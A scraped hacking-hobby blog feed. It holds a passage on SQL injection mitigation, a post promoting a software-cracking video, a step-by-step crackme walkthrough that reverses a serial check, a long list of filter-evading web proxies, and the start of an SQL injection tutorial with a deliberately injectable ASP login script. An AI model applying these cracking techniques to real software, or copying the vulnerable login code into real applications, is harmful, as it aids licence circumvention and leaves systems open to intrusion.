</dt><dd>Even having taken all these mitigation steps, it's nevertheless still possible to miss something and leave the server open to compromise. One ought to design the network infrastructure to <b>assume</b> that the bad guy will have full administrator access to the machine, and then attempt to limit how that can be leveraged to compromise other things. </dd><dd>For instance, putting the machine in a DMZ with extremely limited pinholes "inside" the network means that even getting complete control of the webserver doesn't automatically grant full access to everything else. This won't stop everything, of course, but it makes it a lot harder. </dd><dt> Configure error reporting </dt><dd>The default error reporting for some frameworks includes developer debugging information, and this <b>cannot</b> be shown to outside users. Imagine how much easier a time it makes for an attacker if the full query is shown, pointing to the syntax error involved. </dd><dd>This information <i>is</i> useful to developers, but it should be restricted - if possible - to just internal users. </dd></dl>Note that not all databases are configured the same way, and not all even support the same dialect of SQL (the "S" stands for "Structured", not "Standard"). For instance, most versions of MySQL do not support subselects, nor do they usually allow multiple statements: these are substantially complicating factors when attempting to penetrate a network. <br /><hr /></div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com0tag:blogger.com,1999:blog-289744729559414161.post-88724598271020738262011-02-16T07:35:00.000-08:002011-06-27T20:13:52.751-07:00Ollydbg Basics With Video<div dir="ltr" style="text-align: left;" trbidi="on"><h2 class="title icon">Basic Tutorial Video on How to use Ollydbg and Peid to Crack </h2><div class="content"><div id="post_message_1061"><blockquote class="postcontent restore ">Software Cracking is the art of breaking security protections in a software. Generally software cracks are distributed in the form of patches to the original software or keygen programs which generate arbitrary key / serial combinations. A Cracker works his way through a program by disassembling it and understanding the security protections built into it. He then proceeds to alter the behavior of the program by finding and changing (patching) the routines responsible for the security mechanisms, in order to allow full unlimited access to the program. Alternately, he can also reverse engineer the key / serial comparison routines and write a keygen for the program. This allows users to generate arbitrary valid keys / serials for the program.<br /><br />In this awesome video created by Spiffomatic64, we learn about the basics of software cracking. Spiffomatic64 starts with a basic introduction to the tools of the trade - Ollydbg and Peid. <br /><br />He talks about Ollydbg in detail:<br /><br /><ul><li>the screen organization, shortcuts</li><li>how to run / pause programs</li><li>setting / removing breakpoints</li><li>how to inspect memory / code in a running program</li></ul><br />He then uses a simple crackme <b>prolixe_keygenme1.zip</b> to show how software crackers work their way through a binary. He first verifies using Peid that the program has not been compressed or packed and then loads this program into Ollydbg, disassembles it and then proceeds to find the place in the code responsible for the annoying alert message shown in the beginning and then finally the place responsible for the key validation checks. <br /><br />Once the code in these routines have been understood, he proceeds to patch the binary to convert the crackme into a keygen. Very nicely done. This video is a highly recommended watch for budding reverse engineers!<br /><br />I would recommend that users download the video pack and the crackme all neatly provided in the link below and try the entire process themselves. Thanks go out to Spiffomatic64 for this video.<br /><br /><b>Here is a screenshot of the cracking video in .mp4 <a href="http://www.multiupload.com/SGPL3NTTU4" target="_blank">f</a>ormat:</b><blockquote><a href="http://hotfile.com/dl/48005850/f97c6fa/Ollydebug_and_Peid_cracking_tutorial_video.rar.html" target="_blank"><img alt="" border="0" height="320" src="http://i46.tinypic.com/142v2gx.jpg" style="max-width: 640px;" width="320" /></a><br /></blockquote></blockquote>If the above image not shown just check the video(download it from given link below) <br /><blockquote class="postcontent restore "><blockquote></blockquote><a href="http://hotfile.com/dl/48005850/f97c6fa/Ollydebug_and_Peid_cracking_tutorial_video.rar.html" target="_blank">http://hotfile.com/dl/48005850/f97c6fa/Ollydebug_and_Peid_cracking_tutorial_video.rar.html</a></blockquote><br />writer - hackeramit4u@gmail.com </div></div></div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com1tag:blogger.com,1999:blog-289744729559414161.post-33046040162119860222011-02-15T08:09:00.000-08:002011-06-27T20:13:52.751-07:00Ollydbg Basics for Beginners<div dir="ltr" style="text-align: left;" trbidi="on"><a href="" id="rate">I've decided to write this series of articles almost as a helper to those stuck on Geek 8. Looking at the stats, this seems to be where a lot of users get stuck so hopefully this article will show you how to progress. When I came to this level, I hadn't done anything like this before but since then I've been doing some reading around the subject and (geekily enough) I find it quite interesting. <br /><br />--------------------- <br />Section 1 - The Tools <br />--------------------- <br />1. Ollydbg</a><br /><br />--------------------------- <br />Section 2 - Getting Started <br />--------------------------- <br /><br />Ok, so you should have downloaded the crackme and have Ollydebug installed. First thing to do is close this tutorial and have a play around. See what you can find and get a feel for the program. The very least this will do is teach you how to use basic Ollydebug functions. No cheating now ;-) <br /><br />Done? Well maybe you suprised yourself and found things you thought you'd never find? Maybe you found nothing and reckon you just wasted 30 minutes? Either way, I'll go through the process I used to reverse this and hopefully it will teach you a few things. <br /><br />Okay, so run the crackme and lets have a look around. Well, theres not much to see but we can find a 'Register' box. Enter a user name into the box and a random username. You'll get a message saying 'No luck there mate' (incidentally, if you do happen to guess your serial and get the 'Congratulations' message, I recommend that you buy a lottery ticket today). So we know what we need to do; we need to find the serial - at this point we dont know if its a hard coded number or if its generated from the username but thats part of the fun! <br /><br />Okay, so open Olly and select Crackme1.exe. You'll then be presented with the workings of the application, starting about here : <br /><br />00401000 6A 00 PUSH 0 <br />00401002 E8 FF040000 CALL <JMP.&KERNEL32.GetModuleHandleA> <br />00401007 A3 CA204000 MOV DWORD PTR DS:[4020CA],EAX <br />0040100C 6A 00 PUSH 0 <br /><br />Now, we know that the Crackme is taking whatever we typed and checking it against the correct serial. We therefore need Olly to intercept any calls this crackme makes where it could be reading what we typed from the username and serial boxes. There are a few ways windows does this - its beyond the scope of this article to teach you the depths - but I will tell you that one of them if using the call 'GetDlgItemTextA'. <br /><br />So, what we need to do is make sure that if the Crackme makes this call, Olly intercepts it and breaks for us so that we can follow what is being done with the information. Thats easy enough. If you press Ctrl-N (or right click and select 'Search for' followed by 'name (label) in current module') you are presented with a list of calls made by the crackme. You can then right click on GetDlgItemTextA and select 'set breakpoint on every reference'. <br /><br />We're ready to go. Press F9 and Olly will run the crackme, presenting you with its user interface. Go to the registration box and enter a name and any serial. I'm using "FaTaLPrIdE" and "123456". Press the register button and Olly should break here : <br /><br />004012C4 |. E8 07020000 |CALL <JMP.&USER32.GetDlgItemTextA> <br />004012C9 |. 83F8 01 |CMP EAX,1 <br />004012CC |. C745 10 EB0300> |MOV DWORD PTR SS:[EBP+10],3EB <br /><br />Now, this is the first reference to the call 'GetDlgItemTextA' so we know our serial is shortly going to be read in. If you read the top of you Olly window, it should say [CPU - main thread, module Crackme1]. This is important as when this says Kernel or User32, we know we can keeping stepping as it has nothing to do with our serial - we are only interested in the Crackme. <br /><br />Press F8 to step over the program and try to get a feel for what is going on. Pressing just twice will bring you into User32 and after 15 step overs we are back with the crackme. 25 steps take us back to User32 and 38 take us back again. In future you will use F10 and F12 to step, F8 just shows you more of whats involved. If we continue this process we go through a long session in User32 and eventually land back here: <br /><br />00401223 . 83F8 00 CMP EAX,0 <br />00401226 .^74 BE JE SHORT Crackme1.004011E6 <br />00401228 . 68 8E214000 PUSH Crackme1.0040218E ; ASCII "FaTaL_PrId" <br />0040122D . E8 4C010000 CALL Crackme1.0040137E <br />00401232 . 50 PUSH EAX <br />00401233 . 68 7E214000 PUSH Crackme1.0040217E ; ASCII "123456" <br />00401238 . E8 9B010000 CALL Crackme1.004013D8 <br />0040123D . 83C4 04 ADD ESP,4 <br />00401240 . 58 POP EAX <br />00401241 . 3BC3 CMP EAX,EBX <br />00401243 . 74 07 JE SHORT Crackme1.0040124C <br /><br />This is where the fun begins. We're done with the User32 code and are back with the main routine of the Crackme. Olly even helps show us we're in the right place by showing that our entered username and password are pushed to the stack before calls are made and a compare is made shortly afterwards. <br /><br />For now, press Ctrl-N, select 'GetDlgItemTextA' and press 'remove all breakpoints'. Then select the line 00401223 and press F2 to put a new breakpoint here. What this means is that you can now come back here whenever you run the program without stepping through all the previous steps we have taken. You dont want to search for this again if you press a wrong button somewhere! <br /><br />So, we probably know how we could get the congrats message - a flick of the Z bit at 00401241 or simple patch of the JE at 00401243 should do it. But that doesn't teach us much, we want to know exactly what this crackme is doing in order to test our username and serial. Our job is to trace the calls at 0040122D and 00401238 to find out exactly what is going on here. <br /><br /><br />----------------------------- <br />Section 3 - The First Routine <br />----------------------------- <br /><br />You should still be at 00401243. Press F8 until you highlight the following row: <br />0040122D . E8 4C010000 CALL Crackme1.0040137E <br /><br />Now press F7. The difference between F7 and F8 is that F8 steps over calls and F7 steps into them. In other words, if a call is of no interest to you, you can press F8 to step over it and carry on. If you think that it might contain some vital information, press F7 to step into it and you can look at it in detail. <br /><br />You should now be here : <br /><br />0040137E /$ 8B7424 04 MOV ESI,DWORD PTR SS:[ESP+4] ; Crackme1.0040218E <br />00401382 |. 56 PUSH ESI <br />00401383 |> 8A06 /MOV AL,BYTE PTR DS:[ESI] <br />00401385 |. 84C0 |TEST AL,AL <br />00401387 |. 74 13 |JE SHORT Crackme1.0040139C <br />00401389 |. 3C 41 |CMP AL,41 <br />0040138B |. 72 1F |JB SHORT Crackme1.004013AC <br />0040138D |. 3C 5A |CMP AL,5A <br />0040138F |. 73 03 |JNB SHORT Crackme1.00401394 <br />00401391 |. 46 |INC ESI <br />00401392 |.^EB EF |JMP SHORT Crackme1.00401383 <br />00401394 |> E8 39000000 |CALL Crackme1.004013D2 <br />00401399 |. 46 |INC ESI <br />0040139A |.^EB E7 \JMP SHORT Crackme1.00401383 <br />0040139C |> 5E POP ESI <br />0040139D |. E8 20000000 CALL Crackme1.004013C2 <br /><br />Okay, so we see at 0040137E that our username is loaded into ESI ready for processing. The first character of our username (F in my case) is then moved into AL before being tested to see if it is 0. Then the interesting stuff starts - at 00401389 the F is compared with 41. A strange comparison you might think? <br /><br />Open up a browser window and go to <a href="http://www.asciitable.com/">www.asciitable.com</a> and you'll get a better understanding. The computer deals with character values in hex i.e. next to my F in Olly is the number 46. If you look at the ASCII table you will see that 46 is the hexadecimal representation of 'F' and 41 is the representation of 'A'. What the line at 00401389 is doing then, is its taking the first letter of our username and comparing it with A. The result of this comparison effects what happens at the jump on the next line (0040138B) as if the first letter of our name is less than A (see the ASCII table) it jumps elsewhere. My F is above A though so we continue to 0040138D. <br /><br />Here a similar operation is performed. A quick look at our ASCII values shows us that our character is now being compared with Z - this time a jump is taken if the value is above Z. Obviously, my F is fine and we continue. <br /><br />At 00401399 ESI is incremented before a jump is taken back to 00401383. If you remember, our username is stored in ESI so this has essentially just moved us to the next letter of our username and gone back to the beginning of this routine. My second letter is 'a' so lets see how this is dealt with. <br /><br />Well, stepping through it passes the comparison with 'A' as 61 is indeed greater than 41(A). When we get to the comparison with Z though, it fails and the jump is taken at 0040138F to 00401394. This is because, as the table shows, a(61) is greater than Z(5A). <br /><br />So we land here : <br />00401394 |> E8 39000000 |CALL Crackme1.004013D2 <br /><br />Which in turn sends us here: <br />004013D2 /$ 2C 20 SUB AL,20 <br />004013D4 |. 8806 MOV BYTE PTR DS:[ESI],AL <br />004013D6 \. C3 RETN <br /><br />So whats happening here? Our character is in AL and gets 20 subtracted from it. Whats this for? Check out the ASCII table.... you will see that my 'a' is 20 values higher than 'A' i.e. a-20=A; this sub routine has just capitalised my character! It then jumps back to the routine, increments ESI to the next letter and continues. <br /><br />Step through the rest of the routine and you'll notice that your entire username is processed to make sure its uppercase. Thats all this bit is doing. My username is now FATALPRIDE. <br /><br />A couple of points to note though are that if you only used uppercase letters anyway, this routine is redundant and you wont even see the SUB AL,20 part. Also, if you have non alphabetic characters in there, they'll be taken down 20 values too as they obviously are not between A and Z. <br /><br />Once the last letter of your username has been processed, the TEST AL,AL will fail and the application jumps out of this loop to 0040139C where your newly capitalised name is popped from the stack to ESI. <br /><br />Then comes this line: <br />0040139D |. E8 20000000 CALL Crackme1.004013C2 <br /><br />Press F7 to trace this call - this is the second routine. Setting a breakpoint here may be useful too! <br /><br /><br />------------------------------ <br />Section 4 - The Second Routine <br />------------------------------ <br /><br />When we trace the above call we get the following: <br />004013C2 /$ 33FF XOR EDI,EDI <br />004013C4 |. 33DB XOR EBX,EBX <br />004013C6 |> 8A1E /MOV BL,BYTE PTR DS:[ESI] <br />004013C8 |. 84DB |TEST BL,BL <br />004013CA |. 74 05 |JE SHORT Crackme1.004013D1 <br />004013CC |. 03FB |ADD EDI,EBX <br />004013CE |. 46 |INC ESI <br />004013CF |.^EB F5 \JMP SHORT Crackme1.004013C6 <br />004013D1 \> C3 RETN <br /><br />So whats happening here? Well firstly EDI and EBX are XOR'd with themselves - you've passed enough challenges to know that this always returns a 0 result hence this is just a way of clearing both EDI and EBX. <br /><br />Then a similar thing happens to what happened in the above routine - the only difference being that the first letter of our capitalised username is move to BL rather than AL. Its then tested incase its 0 before landing at 004013CC. <br /><br />If you've read Trope's articles, you'll know that BL (where our character is stored) is just the lower memory in EBX. Hence ADD EDI,EBX is taking the value of that character and adding it to EDI - obviously, we just zero'd EDI so for the first letter, its added to 0. We then increment to the next letter of our username and the process is repeated although notice that the loop does not include the XOR functions each time. This basically has the effect of adding all the values of our username together and storing it in EDI. For my username I get this : <br /><br />F + A + T + A + L + P + R + I + D + E <br />46 + 41 + 54 + 41 + 4C + 50 + 52 + 49 + 44 + 45 = 02DC <br /><br />At the end of the username, we fail the TEST BL,BL and jump out to the return statement at 004013D1. Our summed username (02DC in my case) is still stored in EDI. <br /><br /><br />--------------------------------------- <br />Section 5 - Finishing With The Username <br />--------------------------------------- <br /><br />So the last line of the above routine is : <br />004013D1 \> C3 RETN <br /><br />When we step over this, it takes us back to the end of the first routine, to where the second routine was called from. We land here : <br />004013A2 |. 81F7 78560000 XOR EDI,5678 <br />004013A8 |. 8BC7 MOV EAX,EDI <br /><br />Okay, so here we have another XOR statement - this time the contents of EDI are XOR'd with '5678'. We know that EDI contains our summed username so in my case, this equation is : <br /><br />02DC XOR 5678 - the result is stored in EDI again (54A4 in my case) before the next statement moves it to EAX. We then jump back to the initial code we looked at in section 2. <br /><br />00401223 . 83F8 00 CMP EAX,0 <br />00401226 .^74 BE JE SHORT Crackme1.004011E6 <br />00401228 . 68 8E214000 PUSH Crackme1.0040218E ; ASCII "FaTaL_PrId" <br />0040122D . E8 4C010000 CALL Crackme1.0040137E <br />00401232 . 50 PUSH EAX <br />00401233 . 68 7E214000 PUSH Crackme1.0040217E ; ASCII "123456" <br />00401238 . E8 9B010000 CALL Crackme1.004013D8 <br />0040123D . 83C4 04 ADD ESP,4 <br />00401240 . 58 POP EAX <br />00401241 . 3BC3 CMP EAX,EBX <br />00401243 . 74 07 JE SHORT Crackme1.0040124C <br /><br />The difference is that we have now completed the call at 0040122D and we're now at 00401232 waiting to continue. Congratulations you've just traced your first call and now you understand exactly how this applications processes a username! Now see if you can follow the same procedure for the second call below! Trace into it with F7 and see what you can find...... set a break point first so that if you mess up you can try again or pick this guide up where you left off! <br /><br />------------------------------------ <br />Section 6 - Starting With The Serial <br />------------------------------------ <br /><br />How did you get on? Lets find out.... <br /><br />Firstly we see EAX is pushed to the stack (we know that this contains our summed username XOR'd with 5678 from the previous call) and then our entered serial (123456) is pushed to the stack too. We can then use F7 to trace our second call. We land here : <br /><br />004013D8 /$ 33C0 XOR EAX,EAX <br />004013DA |. 33FF XOR EDI,EDI <br />004013DC |. 33DB XOR EBX,EBX <br />004013DE |. 8B7424 04 MOV ESI,DWORD PTR SS:[ESP+4] <br />004013E2 |> B0 0A /MOV AL,0A <br />004013E4 |. 8A1E |MOV BL,BYTE PTR DS:[ESI] <br />004013E6 |. 84DB |TEST BL,BL <br />004013E8 |. 74 0B |JE SHORT Crackme1.004013F5 <br />004013EA |. 80EB 30 |SUB BL,30 <br />004013ED |. 0FAFF8 |IMUL EDI,EAX <br />004013F0 |. 03FB |ADD EDI,EBX <br />004013F2 |. 46 |INC ESI <br />004013F3 |.^EB ED \JMP SHORT Crackme1.004013E2 <br />004013F5 |> 81F7 34120000 XOR EDI,1234 <br />004013FB |. 8BDF MOV EBX,EDI <br />004013FD \. C3 RETN <br /><br />The first three lines should be no issue - we're clearing the EAX, EDI and EBX registers by XORing them with themselves. Following this, our Serial number is moved into ESI and the processing begins. <br /><br /><br />--------------------------------- <br />Section 7 - Processing The Serial <br />--------------------------------- <br /><br />So you should be at the beginning of the loop at 004013E2. Lets try and work out whats going on here. Firstly, 0A (10) is moved into AL and then the first character of our serial (1 in my case) is moved into BL before being tested for 0 in the usual way. Note though that EBX contains 31 rather than 1 i.e. the hexadecimal representation of the character 1. <br /><br />After this, 30 is subtracted from our number i.e. 31-30 in my case. Then EAX and EDI are multiplied and our processed character added to the result. This is then stored in EDI. <br /><br />In other words, EDI holds (31-30) + (10x0) = 1 ; after one iteration on my serial. The process is then repeated but this time, remember that EDI is no longer 0 so when EDI is multiplied by EAX, we get a different result. i.e. <br /><br />1 (previous iteration) + ( (32-30) + (10x1) ) = 0C <br /><br />Continue this trough the rest of your serial and we get a final result (1e240 in my case). Actually, what this has done is to convert our serial to hex! <br /><br />So we jump out of the loop and land at 004013F5. This is interesting - remember in the last call where the username was uppercased and XOR'd with 5678h? Well here we've just hexed the serial and now we're XORing it with 1234h (result is 1f074 in my case)! <br /><br />Simple really! The result is then moved from EDI to EBX and we jump back to our initial piece of code again! <br /><br /><br />---------------------------- <br />Section 8 - The Final Stages <br />---------------------------- <br /><br />This is it..... the final stages of the crackme. We jump back to here : <br />0040123D . 83C4 04 ADD ESP,4 <br />00401240 . 58 POP EAX <br />00401241 . 3BC3 CMP EAX,EBX <br />00401243 . 74 07 JE SHORT Crackme1.0040124C <br />00401245 . E8 18010000 CALL Crackme1.00401362 <br />0040124A .^EB 9A JMP SHORT Crackme1.004011E6 <br />0040124C > E8 FC000000 CALL Crackme1.0040134D <br /><br />The first line is a quick stack cleanup which then leaves our processed username value (54A4 in my case) on the top of the stack. This is then popped to EAX. <br /><br />Then comes the critical comparison : <br />00401241 . 3BC3 CMP EAX,EBX <br /><br />EAX (the result of our username being processed) and EBX are compared - the two values should look familiar as they are the results of our two calls i.e. in my case they are 54A4 and 1f074. <br /><br />The next jump statement is the critical one - if the two values in EAX and EBX are equal, we jump to the call statement at the bottom of the above code extract.... this is our success box! (Hence the reason I said we could patch this jump to jump if not equal rather than if equal). If EAX and EBX are not equal, we dont jump and we are taken down the 'No luck there mate' routine - this is where I go on this occasion as 123456 is not my correct serial. <br /><br /><br />----------------------------------- <br />Section 9 - Determining Your Serial <br />----------------------------------- <br /><br />So, we have found that the crucial operation is a comparison of our processed username and our processed serial. Specifically, our processed serial give the same result as our processed username in order to be valid. So how do we achieve this? <br /><br />Well, this is where knowledge of the XOR function brings us through. We know that : <br />if A XOR B = C <br />then C XOR B = A. <br /><br />So how is this useful? <br />Well, looking at the way the serial is processed, our entered serial in hex XOR with 1234 must equal our processed username (in my case 54A4). Using the above reasoning then, our serial is our processed username XOR with 1234 i.e. (for me) <br /><br />Serial for FaTaLPrIdE = 54A4 XOR 1234 <br /><br />5 4 A 4 = 0101 0100 1010 0100 <br />1 2 3 4 = 0001 0010 0011 0100 <br />SERIAL = 0100 0110 1001 0000 = 4690h <br /><br />Convert to Decimal = 16 + 128 + 512 + 1024 + 16384 = 18064 <br />(we need to do this as we are reversing the fact that our program coverts the decimal serial we entered into hex). <br /><br />Hence I have username FaTaLPrIdE (not case sensitive due to the uppercasing routine) and serial 18064. <br /><br /><br />----------------------- <br />Section 10 - Conclusion <br />----------------------- <br /><br />So thats it! I hope you enjoyed this and found it useful. As I say, I'm a complete beginner at this so I thought a beginners guide written by a beginner would be useful to a few people. <br /><br />If you like this, just pop a comment below and let me know. Similarly, if you have a criticism or improvement, I'd like to hear it too. Please don't tell me it was too simple though as that was the point of the article - to explain as much as I could for those who have never used a debugger before. <br /><br />I'd recommend trying crackme 2 if you get a chance. Personally, I think its easier than this one - use the same techniques and work out how your password is being dealt with. I'll write a tutorial when I get a chance, but feel free to PM me if you want a helping hand before the article is out. <br /><br />As you for you reading this because level 8 is bothering you, I hope this will help you out. Level 8 has a few extra tricks up its sleeve but if you've got that far, you should be able to sort through them. Just logically step through and work out exactly what is happening - write it down to keep note. <br /><br />Thanks for reading. Please dont reproduce this on other sites - its written specifically for the Geeks ;-)</div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com3tag:blogger.com,1999:blog-289744729559414161.post-87851979055465230902011-02-13T00:30:00.000-08:002011-06-27T20:13:52.751-07:00Exploration Of All Proxies<div dir="ltr" style="text-align: left;" trbidi="on">Anonymouse – A very good free anonymizer. By using this CGI proxy you can anonymously surf web pages, send anonymous e-mails and look at news.<br />ProxyKing.net – This anonymizer service keeps websites from tracking your internet movements by preventing them from placing cookies on your home computer.<br />AnonymousIndex.com – Anonymous private surfing service, hide your ip, manage website ads, referrers and cookies through this free web based proxy.<br />HideMyAss.com – Free anonymous browsing, for the times when you REALLY need to hide your ass online!<br />ProxyFoxy.com – Proxy Foxy offers you free anonymous surfing. With our free tool you can surf the Internet safe and secure without revealing your identity. Avoid cookies, spyware and other malicious scripts.<br /><br /><br /><br /><br />http://www.perfectproxy.com/<br />http://www.primeproxy.com/<br />http://www.proxyaware.com/<br />http://www.proxycraze.com/<br />http://www.proxygasp.com/<br />http://www.proxyplease.com/<br />http://www.someproxy.com/<br />http://www.stupidproxy.com/<br />http://ipchicken.com<br />http://www.Stealth-ip.com<br />http://www.Stealth-ip.org<br />http://www.Stealth-ip.us<br />http://www.Stealth-ip.info<br />http://poxy.us.to/<br />http://www.BlockFilter.com<br />http://www.ecoproxy.com/<br />http://www.coreproxy.com/<br />http://proxymy.com/<br />http://www.illegalproxy.com/<br />http://www.filterfakeout.com/<br />http://www.privacybrowsing.com/<br />http://www.w00tage.com/<br />http://www.aplusproxy.com/<br />http://www.arandomproxy.com/<br />http://www.w3privacy.com/<br />http://argentinaproxy.com<br />http://hotyogasite.com<br />http://damaliens.com<br />http://swagproxy.com<br />http://cloak-me.info<br />http://247websurf.com<br />http://proxify.net<br />http://salemguide.info<br />http://your-proxy.org<br />http://amandas-proxy.info<br />http://co-i.info<br />http://w3privacy.com<br />http://thecrazynetwork.com<br />http://pajaxy.com<br />http://mtgtv.com<br />http://visitriga.info<br />http://gfun.info<br />http://surfsizzle.com<br />http://thecrazycall.com<br />http://proxify.com<br /><br />http://www.proxy1.info/<br />http://www.proxy2info/<br />http://www.proxy3.info/<br />http://www.proxy4.info/<br />http://www.proxy5.info/<br />http://www.proxy6.info/<br />http://www.proxy7.info/<br />http://www.proxy8.info/<br />http://www.proxy9.info/<br />http://www.proxy10.info/<br />http://www.proxy11.info/<br />http://www.proxy12.info/<br />http://www.proxy13.info/<br />http://www.proxy14.info/<br />http://www.proxy15.info/<br />http://www.proxy16.info/<br />http://www.proxy17.info/<br />http://www.proxy18.info/<br />http://www.proxy19.info/<br />http://www.proxy20.info/<br />http://www.proxyok.com/<br /><br />http://www.boredatwork.info/<br />http://www.anonymousurfing.info/<br />http://www.browsingwork.com/<br />http://www.freeproxyserver.org/<br />http://www.browseany.com/<br />http://www.browsesecurely.com/<br />http://IEproxy.com/<br />http://www.sneak3.po.gs/<br />http://www.proxytastic.com/<br />http://www.freewebproxy.org/<br />http://www.thecgiproxy.com/<br />http://www.hide-me.be/<br />http://www.anotherproxy.com/<br />http://www.proxy77.com/<br />http://www.surf-anon.com/<br />http://www.free-proxy.info/<br />http://www.theproxysite.info/<br />http://www.proxyify.info/<br />http://www.concealme.com/<br /><br />http://imsneaky.com<br />http://lawi.info<br />http://fieldcollege.info<br />http://bigredhot.com<br />http://portugalproxy.com<br />http://aboutgreatbritain.info<br />http://surf24h.com<br />http://xoxy.com<br />http://proxyparadise.info<br />http://proxycrib.com<br />http://unblock.biz<br />http://newzealandproxy.com<br />http://your-proxy.info<br />http://privatproxy.com<br />http://filterfreesurfing.com<br />http://allaccessproxy.com<br />http://hotwinebaskets.com<br />http://spainwine.info<br />http://couldfind.info<br />http://proxy-blog.com<br />http://serfs.info<br />http://macaoguide.info<br />http://proxoid.com<br />http://rentaustin.info<br />http://safesurfingweb.com<br />http://proxyfans.com<br />http://metnyc.info<br />http://speedroxi.com<br />http://ehide.info<br />http://ipow.info<br />http://babyboomerco.com<br />http://proxclub.com<br />http://anonysurf.nl<br />http://mylittleproxy.com<br />http://gz299.com<br />http://us-proxy.com<br />http://goinvis.com<br />http://freeproxy.in<br />http://onesimpleproxy.com<br />http://supaproxy.net<br />http://dedicatedproxy.com<br />http://india-proxy.com<br />http://greekdating.info<br />http://reliableproxy.com<br />http://dontshowmyip.info<br /><br />http://proxcool.com<br />http://prxy.net.ms<br />http://hidip.info<br />http://cutmy.info<br />http://hidelink.ingo<br />http://xoogie.net<br />http://oproxy.info<br />http://stealth-ip.net<br />http://safeforwork.net<br />http://vtunnel.com<br />http://freeproxy.ru/en/free_proxy/cg...<br />http://proxydrop.com/<br />http://proxydrop.net/<br />http://proxydrop.biz/<br />http://proxydrop.info/<br />http://proxydrop.org/<br />http://backfox.com<br />http://ninjaproxy.com/<br />http://atunnel.com<br />http://vpntunnel.net<br />http://btunnel.com<br />http://ctunnel.com<br />http://dtunnel.com<br />http://proxyhost.org<br />http://webproxy.dk<br />http://phproxy.frac.dk<br />http://phproxy.1go.dk<br />http://proxify.com<br />http://home.no.net/roughnex<br />http://nomorefilter.com<br />http://rapidwire.net<br />http://oproxy.info<br />http://stealth-ip.net<br />http://cooltunnell.com<br />http://schoolsurf.com<br />http://anonymouse.org<br /><br />http://megaproxy.com/<br />http://amegaproxy.com/<br />http://theproxy.be/<br />http://newproxy.be/<br />http://projectbypass.com/<br />http://smartproxy.net/<br />http://proxy.org/cgi_proxies.shtml<br />http://hidebehind.net<br />http://Proxy7.com<br />http://pcriot.com/<br />http://tools.rosinstrument.com/cgi-p...<br />http://www.proxyspider.com/index.php<br />http://welazy.com/nick<br />http://reallycoolproxy.com<br />http://vidznet.com/index.php?pid=3<br />http://proxyholic.com<br /><br />http://www.freeproxy.ru/index.htm<br />http://www.freeproxy.ru/ru/index.htm<br />http://www.freeproxy.ru/<br />http://www.freeproxy.info/<br />http://www.freeproxy.ru/ru/index.htm<br />http://www.freeproxy.ru/en/programs/<br />http://www.freeproxy.ru/en/free_proxy/<br />http://www.freeproxy.ru/en/misc.htm<br />http://www.freeproxy.ru/en/news.htm<br />http://www.freeproxy.ru/en/contacts/<br />http://www.checker.freeproxy.ru/checker/<br />http://www.freeproxy.ru/shop/<br />http://www.forum.freeproxy.ru/<br />http://anonymouse.ws/<br /></div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com0tag:blogger.com,1999:blog-289744729559414161.post-6557760683373859972011-02-09T21:43:00.000-08:002011-06-27T20:13:52.752-07:00Full SQL Injection Tutorial (MySQL) Update with Basics<div dir="ltr" style="text-align: left;" trbidi="on">Now most of us here to learn how to hack ?? but i know also there is some few people here own websites , so they can prevent the sqli attack too .<br /><br />-- I didn't wrote this topic , i just found it in some website and i'll post it the link @ the end of the topic ..... so this work is not mine .<br /><br />Some stuff here is not totally new , but for Newbies like me it's really good . so enough talk and let's start .<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ :<br /><br />The database is the heart of most Web applications: it stores the data needed for the Websites and applications to "survive". It stores user credentials and sensitive financial information. It stores preferences, invoices, payments, inventory data, etc. It is through the combination of a database and Web scripting language that we as developers can produce sites that keep clients happy, pay the bills, and -- most importantly -- run our businesses.<br /><br />But what happens when you realize that your critical data may not be safe? What happens when you realize that a new security bug has just been found? Most likely you either patch it or upgrade your database server to a later, bug-free version. Security flaws and patches are found all the time in both databases and programming languages, but I bet 9 out of 10 of you have never heard of SQL injection attacks...<br /><br />In this article I'll attempt to shed some light on this under-documented attack, explaining what an SQL injection attack is and how you can prevent one from occurring within your company. By the end of this article you'll be able to identify situations where an SQL injection attack may allow unauthorized persons to penetrate your system, and you'll learn ways to fix existing code to prevent an SQL injection attack.<br /><br />What is an SQL Injection Attack?<br />As you may know, SQL stands for Structured Query Language. It comes in many different dialects, most of which are based on the SQL-92 ANSI standard. An SQL query comprises one or more SQL commands, such as SELECT, UPDATE or INSERT. For SELECT queries, each query typically has a clause by which it returns data, for example:<br /><br />SELECT * FROM Users WHERE userName = 'justin';<br /><br />The clause in the SQL query above is WHERE username = 'justin', meaning that we only want the rows from the Users table returned where the userName field is equal to the string value of Justin.<br /><br />It's these types of queries that make the SQL language so popular and flexible... it's also what makes it open to SQL injection attacks. As the name suggests, an SQL injection attack "injects" or manipulates SQL code. By adding unexpected SQL to a query, it is possible to manipulate a database in many unanticipated ways.<br /><br />One of the most popular ways to validate a user on a Website is to provide them with an HTML form through which they can enter their username and password. Let's assume that we have the following simple HTML form:<br /><br /><form name="frmLogin" action="login.asp" method="post"> <br />Username: <input type="text" name="userName"> <br />Password: <input type="text" name="password"> <br /><input type="submit"> <br /></form><br /><br />When the form is submitted, the contents of the username and password fields are passed to the login.asp script, and are available to that script through the Request.Form collection. The easiest way to validate this user would be to build an SQL query, and then check that query against the database to see whether that user exists. We could create a login.asp script like this:<br /><br /><% <br /><br />dim userName, password, query <br />dim conn, rS <br /><br />userName = Request.Form("userName") <br />password = Request.Form("password") <br /><br />set conn = server.createObject("ADODB.Connection") <br />set rs = server.createObject("ADODB.Recordset") <br /><br />query = "select count(*) from users where userName='" & <br />userName & "' and userPass='" & password & "'" <br /><br />conn.Open "Provider=SQLOLEDB; Data Source=(local); <br />Initial Catalog=myDB; User Id=sa; Password=" <br />rs.activeConnection = conn <br />rs.open query <br /><br />if not rs.eof then <br />response.write "Logged In" <br />else <br />response.write "Bad Credentials" <br />end if <br /><br />%><br /><br />In the example above, the user either sees "Logged In" if their credentials matched a record in the database, or "Bad Credentials" if they didn't. Before we continue, let's create the database that we have queried in the sample code. <br /><br />Let's also create a users table with some dummy records:<br /><br />create database myDB <br />go 